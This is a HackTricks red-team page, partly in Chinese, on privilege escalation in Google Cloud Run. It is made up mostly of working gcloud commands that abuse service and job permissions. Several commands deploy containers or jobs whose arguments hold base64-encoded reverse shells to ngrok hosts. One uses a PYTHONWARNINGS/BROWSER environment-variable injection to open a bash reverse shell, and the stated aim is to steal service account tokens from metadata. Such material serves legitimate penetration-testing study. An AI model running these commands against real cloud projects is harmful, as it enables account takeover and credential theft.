GCP - Run Privesc

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

Cloud Run

For more information about Cloud Run check:

GCP - Cloud Run Enum

run.services.create , iam.serviceAccounts.actAs, run.routes.invoke

具有这些权限的攻击者可以创建一个运行任意代码的 run 服务(任意 Docker container),将 Service Account 附加到该服务,并让代码从 metadata 中 exfiltrate Service Account token

An exploit script for this method can be found here and the Docker image can be found here.

Note that when using gcloud run deploy instead of just creating the service it needs the update permission. Check an example here.

run.services.update , iam.serviceAccounts.actAs

与前者类似,但更新已存在的服务:

# Launch some web server to listen in port 80 so the service works
echo "python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1" | base64
# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg==

gcloud run deploy hacked \
--image=ubuntu:22.04 \  # Make sure to use an ubuntu version that includes python3
--command=bash \
--args="-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

# If you don't have permissions to use "--allow-unauthenticated", dont use it

run.services.setIamPolicy

为自己授予对 cloud Run 的提升权限。

# Change policy
gcloud run services set-iam-policy <SERVICE_NAME> <POLICY_FILE>.json \
--region=us-central1

# Add binding
gcloud run services add-iam-policy-binding <SERVICE_NAME> \
--member="allUsers" \
--role="roles/run.invoker" \
--region=us-central1

# Remove binding
gcloud run services remove-iam-policy-binding <SERVICE_NAME> \
--member="allUsers" \
--role="roles/run.invoker" \
--region=us-central1

run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)

启动一个包含 reverse shell 的 job,以窃取命令中指示的 service account。你可以在此找到一个 exploit here.

gcloud beta run jobs create jab-cloudrun-3326 \
--image=ubuntu:latest \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash" \
--service-account="<sa>@$PROJECT_ID.iam.gserviceaccount.com" \
--region=us-central1

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

类似于前一个,可以 update a job and update the SA,插入要执行的 command 并运行:

gcloud beta run jobs update hacked \
--image=mubuntu:latest \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--execute-now

run.jobs.setIamPolicy

为自己授予对 Cloud Jobs 的前述权限。

# Change policy
gcloud run jobs set-iam-policy <JOB_NAME> <POLICY_FILE>.json \
--region=us-central1

# Add binding
gcloud run jobs add-iam-policy-binding <JOB_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="roles/run.invoker" \
--region=us-central1

# Remove binding
gcloud run jobs remove-iam-policy-binding <JOB_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="roles/run.invoker" \
--region=us-central1

run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)

滥用 job 执行的 env variables 来执行任意代码并获取 reverse shell,从而转储 container(source code)的内容并访问 metadata 中的 SA:

gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"

参考资料

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks